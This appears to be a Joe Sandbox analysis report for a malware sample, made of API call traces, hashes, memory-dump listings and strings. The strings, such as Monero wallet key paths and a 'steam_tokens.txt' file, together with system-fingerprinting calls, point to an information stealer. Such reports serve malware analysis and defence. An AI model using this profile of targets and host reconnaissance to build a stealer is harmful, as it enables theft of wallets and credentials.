Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 99630494009c37d6b59311cc97e41ee7eedb4af09021b95b7a084d162028dc6e
Instruction ID: 0aed2e4871a74be2d30bc8b0708f19297b913e3351460bc89bf8a9ada5f7989d
Opcode Fuzzy Hash: 99630494009c37d6b59311cc97e41ee7eedb4af09021b95b7a084d162028dc6e
Instruction Fuzzy Hash: 02E0E67094A348FFEF10ABE59C0EB0D77B8EB14B01F104055F709B61D0D6B52641969A

Function 008A1A10 Relevance: 3.9, APIs: 2, Instructions: 857stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A7500: GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008A7542
Part of subcall function 008A7500: GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A757F
Part of subcall function 008A7500: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7603
Part of subcall function 008A7500: RtlAllocateHeap.NTDLL(00000000), ref: 008A760A

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008A7690: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A76A4
Part of subcall function 008A7690: RtlAllocateHeap.NTDLL(00000000), ref: 008A76AB

Part of subcall function 008A77C0: GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,00000000,008ADBC0,000000FF,?,008A1C99,00000000,?,0156D5F8,00000000,?), ref: 008A77F2
Part of subcall function 008A77C0: IsWow64Process.KERNEL32(00000000,?,?,?,?,?,00000000,008ADBC0,000000FF,?,008A1C99,00000000,?,0156D5F8,00000000,?), ref: 008A77F9

Part of subcall function 008A7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008911B7), ref: 008A7880
Part of subcall function 008A7850: RtlAllocateHeap.NTDLL(00000000), ref: 008A7887
Part of subcall function 008A7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 008A789F

Part of subcall function 008A78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7910
Part of subcall function 008A78E0: RtlAllocateHeap.NTDLL(00000000), ref: 008A7917
Part of subcall function 008A78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 008A792F

Part of subcall function 008A7980: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E00,00000000,?), ref: 008A79B0
Part of subcall function 008A7980: RtlAllocateHeap.NTDLL(00000000), ref: 008A79B7
Part of subcall function 008A7980: GetLocalTime.KERNEL32(?,?,?,?,?,008B0E00,00000000,?), ref: 008A79C4
Part of subcall function 008A7980: wsprintfA.USER32 ref: 008A79F3

Part of subcall function 008A7A30: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,0156DF50,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7A63
Part of subcall function 008A7A30: RtlAllocateHeap.NTDLL(00000000), ref: 008A7A6A
Part of subcall function 008A7A30: GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,0156DF50,00000000,?,008B0E10,00000000,?,00000000,00000000,?), ref: 008A7A7D

Part of subcall function 008A7B00: GetUserDefaultLocaleName.KERNEL32(00000055,00000055,?,?,?,00000000,00000000,?,0156DF50,00000000,?,008B0E10,00000000,?,00000000,00000000), ref: 008A7B35

Part of subcall function 008A7B90: GetKeyboardLayoutList.USER32(00000000,00000000,008B05AF), ref: 008A7BE1
Part of subcall function 008A7B90: LocalAlloc.KERNEL32(00000040,?), ref: 008A7BF9
Part of subcall function 008A7B90: GetKeyboardLayoutList.USER32(?,00000000), ref: 008A7C0D
Part of subcall function 008A7B90: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 008A7C62
Part of subcall function 008A7B90: LocalFree.KERNEL32(00000000), ref: 008A7D22

Part of subcall function 008A7D80: GetSystemPowerStatus.KERNEL32(?), ref: 008A7DAD

GetCurrentProcessId.KERNEL32(00000000,?,0156D4B8,00000000,?,008B0E24,00000000,?,00000000,00000000,?,0156DE60,00000000,?,008B0E20,00000000), ref: 008A207E

Part of subcall function 008A9470: OpenProcess.KERNEL32(00000410,00000000,?), ref: 008A9484
Part of subcall function 008A9470: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 008A94A5
Part of subcall function 008A9470: CloseHandle.KERNEL32(00000000), ref: 008A94AF

Part of subcall function 008A7E00: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7E37
Part of subcall function 008A7E00: RtlAllocateHeap.NTDLL(00000000), ref: 008A7E3E
Part of subcall function 008A7E00: RegOpenKeyExA.KERNEL32(80000002,0155BAF0,00000000,00020119,?), ref: 008A7E5E
Part of subcall function 008A7E00: RegQueryValueExA.KERNEL32(?,0156D658,00000000,00000000,000000FF,000000FF), ref: 008A7E7F
Part of subcall function 008A7E00: RegCloseKey.ADVAPI32(?), ref: 008A7E92

Part of subcall function 008A7F60: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,00000000), ref: 008A7FC9
Part of subcall function 008A7F60: GetLastError.KERNEL32 ref: 008A7FD8

Part of subcall function 008A7ED0: GetSystemInfo.KERNEL32(008B0E2C), ref: 008A7F00
Part of subcall function 008A7ED0: wsprintfA.USER32 ref: 008A7F16

Part of subcall function 008A8100: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0156DE00,00000000,?,008B0E2C,00000000,?,00000000), ref: 008A8130
Part of subcall function 008A8100: RtlAllocateHeap.NTDLL(00000000), ref: 008A8137
Part of subcall function 008A8100: GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 008A8158
Part of subcall function 008A8100: wsprintfA.USER32 ref: 008A81AC

Part of subcall function 008A87C0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,008B0E28,00000000,?), ref: 008A882F
Part of subcall function 008A87C0: RtlAllocateHeap.NTDLL(00000000), ref: 008A8836
Part of subcall function 008A87C0: wsprintfA.USER32 ref: 008A8850

Part of subcall function 008A8320: RegOpenKeyExA.KERNEL32(00000000,0156AA80,00000000,00020019,00000000,008B05B6), ref: 008A83A4

Part of subcall function 008A8320: RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 008A8426
Part of subcall function 008A8320: wsprintfA.USER32 ref: 008A8459
Part of subcall function 008A8320: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 008A847B
Part of subcall function 008A8320: RegCloseKey.ADVAPI32(00000000), ref: 008A848C
Part of subcall function 008A8320: RegCloseKey.ADVAPI32(00000000), ref: 008A8499

Part of subcall function 008A8680: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,008B05B7), ref: 008A86CA
Part of subcall function 008A8680: Process32First.KERNEL32(?,00000128), ref: 008A86DE
Part of subcall function 008A8680: Process32Next.KERNEL32(?,00000128), ref: 008A86F3
Part of subcall function 008A8680: CloseHandle.KERNEL32(?), ref: 008A8761

lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,00000000), ref: 008A265B

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$Allocate$Closewsprintf$NameOpenlstrcpy$InformationLocal$CurrentHandleInfoKeyboardLayoutListLocaleProcess32StatusSystemTimeUserlstrcatlstrlen$AllocComputerCreateDefaultDirectoryEnumErrorFileFirstFreeGlobalLastLogicalMemoryModuleNextPowerProcessorQuerySnapshotToolhelp32ValueVolumeWindowsWow64Zone
String ID:
API String ID: 60318822-0
Opcode ID: 48ce5d9b50a1541350c1b138b0eb465f9d033dec770f0e3927a1ea510f10c24f
Instruction ID: 69fe49d9b3f408494ee22e833b913882386d033a0f91257ac03049980d7adb32
Opcode Fuzzy Hash: 48ce5d9b50a1541350c1b138b0eb465f9d033dec770f0e3927a1ea510f10c24f
Instruction Fuzzy Hash: AB726D71810018AAEB5DFB94DC92DEE7338FF15300F5582A9B517A2C51EF342B49CA67

Function 00896D40 Relevance: 3.2, APIs: 2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e93c71b1b9b74f8e49a867b0c0d624ea050c167856bd49c179e821e2d0a88e0b
Instruction ID: 3f31211ff74f0f5b50cb47dd51076bca79a7c19f0fd3ba2d30ef42578cbe1e06
Opcode Fuzzy Hash: e93c71b1b9b74f8e49a867b0c0d624ea050c167856bd49c179e821e2d0a88e0b
Instruction Fuzzy Hash: 7961F7B4900219DBCF14EF94D944BEEB7B0FB04304F188599E419A7280E775AEA4DF91

Function 008A70D0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 008A718C

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
API String ID: 3722407311-4138519520
Opcode ID: 4ad009d3262b8c002b27fd05a00703390bcf0e08656804c6795728500ba7f2e8
Instruction ID: b408f7421e31672d8306a32f5cc9ab6692e56a9eb773ef94476e3398fdd9c561
Opcode Fuzzy Hash: 4ad009d3262b8c002b27fd05a00703390bcf0e08656804c6795728500ba7f2e8
Instruction Fuzzy Hash: 5E518FB0D042189BEB24EB94DC85BEEB3B4FF05304F1041A8E216F6681EB746E88DF55

Function 008A5100 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 40stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA820: lstrlen.KERNEL32(00894F05,?,?,00894F05,008B0DDE), ref: 008AA82B
Part of subcall function 008AA820: lstrcpy.KERNEL32(008B0DDE,00000000), ref: 008AA885

lstrlen.KERNEL32(00000000,00000000,008B0ACA), ref: 008A512A

Strings

steam_tokens.txt, xrefs: 008A513F

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen
String ID: steam_tokens.txt
API String ID: 2001356338-401951677
Opcode ID: 642a2b18463b17687ee066117ac7a2923277d87c4c6d2c7d626dd4cc9a4b50e8
Instruction ID: a0ce335230ddef4dc80a68926019a94167f477e8948d8c40e93e105b980989b0
Opcode Fuzzy Hash: 642a2b18463b17687ee066117ac7a2923277d87c4c6d2c7d626dd4cc9a4b50e8
Instruction Fuzzy Hash: 77F0FB7191010866EF48F7B8DC569ED773CFA56300F404168B457E2D92EF386A09C6A3

Function 008A7ED0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(008B0E2C), ref: 008A7F00
wsprintfA.USER32 ref: 008A7F16

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: InfoSystemwsprintf
String ID:
API String ID: 2452939696-0
Opcode ID: 3f27353d2d088b31e92c1e987d743e360c2906f7b7e7884d2c0633ea55d3032e
Instruction ID: 82015a53743c8531b67178aa748ae2a0a584386ededddda84f0098e5ff3e5403
Opcode Fuzzy Hash: 3f27353d2d088b31e92c1e987d743e360c2906f7b7e7884d2c0633ea55d3032e
Instruction Fuzzy Hash: 16F06DB1A04218EBDB10CF84DC45FAAF7BCFB49B24F00066AF515E2680D7796A048BE1

Function 0089B4F0 Relevance: 2.9, APIs: 2, Instructions: 397stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

lstrlen.KERNEL32(00000000), ref: 0089B9C2
lstrlen.KERNEL32(00000000), ref: 0089B9D6

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
